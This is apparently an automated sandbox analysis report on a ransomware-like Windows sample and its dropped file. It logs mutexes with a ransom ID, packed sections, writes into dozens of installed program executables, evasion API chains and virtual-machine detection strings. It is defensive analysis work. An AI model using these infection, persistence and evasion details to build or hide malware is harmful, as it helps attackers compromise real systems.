Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5580
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5540
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\pc_group=WORKGROUP&ransom_id=f816ca825b40424e
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe Automated click: OK
Source: SY5DeZW6pz.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH

Data Obfuscation

Source: Yara match File source: SY5DeZW6pz.exe, type: SAMPLE
Source: Yara match File source: 0.0.SY5DeZW6pz.exe.3760000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.SY5DeZW6pz.exe.f390000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SY5DeZW6pz.exe.3760000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SY5DeZW6pz.exe.3760000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.SY5DeZW6pz.exe.f390000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.SY5DeZW6pz.exe.3760000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.307798996.000000000F39A000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.353018126.000000000F39A000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.324788306.000000000F39A000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.317714677.000000000F39A000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.352730641.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.324233119.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SY5DeZW6pz.exe PID: 5580, type: MEMORYSTR
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F3A8E7B push ebp; ret 0_2_0F3A8E7E
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F3A8E85 push 00000000h; ret 0_2_0F3A9296
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe Code function: 1_2_00C21638 push dword ptr [00C23084h]; ret 1_2_00C2170E
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe Code function: 1_2_00C2600A push ebp; ret 1_2_00C2600D
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe Code function: 1_2_00C26014 push 00C214E1h; ret 1_2_00C26425
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe Code function: 1_2_00C22D9B push ecx; ret 1_2_00C22DAB
Source: SY5DeZW6pz.exe Static PE information: section name: |Zu8
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_0
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_1
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_2
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_3
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_4
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_5
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_6
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_7
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_8
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_9
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_10
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_11
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_12
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_13
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_14
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_15
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_16
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_17
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_18
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_19
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_20
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_21
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_22
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_23
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_24
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_25
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_26
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_27
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_28
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_29
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_30
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_31
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_32
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_33
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_34
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_35
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_36
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_37
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_38
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_39
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_40
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_41
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_42
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_43
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_44
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_45
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_46
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_47
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_48
Source: SY5DeZW6pz.exe Static PE information: section name: .dat_49
Source: vSQshX.exe.0.dr Static PE information: section name: .aspack
Source: vSQshX.exe.0.dr Static PE information: section name: .adata
Source: MyProg.exe.1.dr Static PE information: section name: PELIB
Source: MyProg.exe.1.dr Static PE information: section name: Y|uR
Source: SciTE.exe.1.dr Static PE information: section name: ruO
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F398150 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree, 0_2_0F398150
Source: initial sample Static PE information: section where entry point is pointing to: |Zu8
Source: initial sample Static PE information: section name: |Zu8 entropy: 6.934749160260163
Source: initial sample Static PE information: section name: .text entropy: 7.81169422100848
Source: initial sample Static PE information: section name: Y|uR entropy: 6.934889298048315
Source: initial sample Static PE information: section name: ruO entropy: 6.934278783546333

Persistence and Installation Behavior

Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\google\Update\1.3.36.131\GoogleUpdateComRegisterShell64.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroRd32.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.NetFX40.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files\Google\Chrome\Application\104.0.5112.81\chrome_pwa_launcher.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\google\Update\1.3.36.131\GoogleUpdate.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\lync.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\misc.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\DCF\filecompare.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\lync99.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\autoit3\AutoIt3Help.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\ssvagent.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\UcMapi.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\ONENOTE.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\PDFREFLOW.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\autoit3\Examples\Helpfile\Extras\MyProg.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\WINWORD.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroBroker.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\MSOSREC.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\OUTLOOK.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\DCF\Common.DBConnection.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\protocolhandler.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\MSQRY32.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\wow_helper.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files\Google\Chrome\Application\104.0.5112.81\notification_helper.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\arh.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\SELFCERT.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.NetFX45.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\WORDICON.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\MSPUB.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\google\Update\1.3.36.131\GoogleCrashHandler64.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files\Google\Chrome\Application\chrome.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\jabswitch.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\DCF\DATABASECOMPARE.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\google\Update\1.3.36.131\GoogleCrashHandler.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\SETLANG.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\autoit3\Aut2Exe\Aut2exe_x64.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\ACCICONS.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\FIRSTRUN.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\MSACCESS.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\POWERPNT.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\autoit3\Uninstall.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\google\Update\1.3.36.131\GoogleUpdateCore.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\DCF\Common.ShowHelp.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\SCANPST.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\autoit3\Au3Check.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\jp2launcher.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\MSOHTMED.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\CLVIEW.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\NAMECONTROLSERVER.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\IEContentService.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\java.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\CNFNOT32.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files\Google\Chrome\Application\104.0.5112.81\Installer\chrmstp.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files\Microsoft Office\Office16\AppSharingHookController64.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\excelcnv.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\GROOVE.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\OcPubMgr.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroRd32Info.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\java-rmi.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\google\Update\1.3.36.131\GoogleUpdateBroker.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\unpack200.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\javacpl.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\ONENOTEM.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroLayoutRecognizer\AcroLayoutRecognizer.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\msoev.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\MSOUC.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files\Microsoft Office\Office16\MSOHTMED.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\autoit3\SciTE\SciTE.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\GRAPH.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\EXCEL.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\PPTICO.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\LogTransport2.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\lynchtmlconv.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\javaws.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files\Google\Chrome\Application\104.0.5112.81\elevation_service.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\Eula.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\autoit3\Au3Info.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\autoit3\AutoIt3_x64.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\AppSharingHookController.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\OSPPREARM.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\MSOSYNC.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\XLICONS.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\DCF\Common.DBConnection64.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files\Microsoft Office\Office16\msoia.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\104.0.5112.81\chrome_installer.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\autoit3\Au3Info_x64.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\Wordconv.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\autoit3\Aut2Exe\Aut2exe.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\DCF\SPREADSHEETCOMPARE.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft analysis services\AS OLEDB\110\SQLDumper.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\VPREVIEW.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\reader_sl.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\autoit3\Aut2Exe\upx.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\google\Update\1.3.36.131\GoogleUpdateSetup.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\msotd.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\orbd.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe File created: C:\Users\user\AppData\Local\Temp\vSQshX.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe File created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

Hooking and other Techniques for Hiding and Protection

Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 799
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe Code function: 1_2_00C21718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00C21754h 1_2_00C21718
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: EnumDeviceDrivers,K32EnumDeviceDrivers,VirtualAlloc,K32EnumDeviceDrivers,K32GetDeviceDriverBaseNameW,lstrcmpiW,VirtualFree,VirtualFree, 0_2_0F392F50
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F396A40 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose, 0_2_0F396A40
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F396C90 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose, 0_2_0F396C90
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe Code function: 1_2_00C229E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpi,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpi,FindNextFileA,FindClose, 1_2_00C229E2
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe Code function: 1_2_00C22B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread, 1_2_00C22B8C
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe File opened: C:\ProgramData\Application Data\Application Data\Application Data\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe File opened: C:\ProgramData\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe File opened: C:\ProgramData\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe File opened: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe File opened: C:\ProgramData\Application Data\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe File opened: C:\ProgramData\Application Data\Application Data\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
Source: Amcache.hve.1.dr Binary or memory string: VMware
Source: Amcache.hve.1.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.1.dr Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.1.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.1.dr Binary or memory string: VMware-42 35 9c fb 73 fa 4e 1b-fb a4 60 e7 7b e5 4a ed
Source: Amcache.hve.1.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.1.dr Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: Amcache.hve.1.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.1.dr Binary or memory string: VMware7,1
Source: Amcache.hve.1.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.1.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.1.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
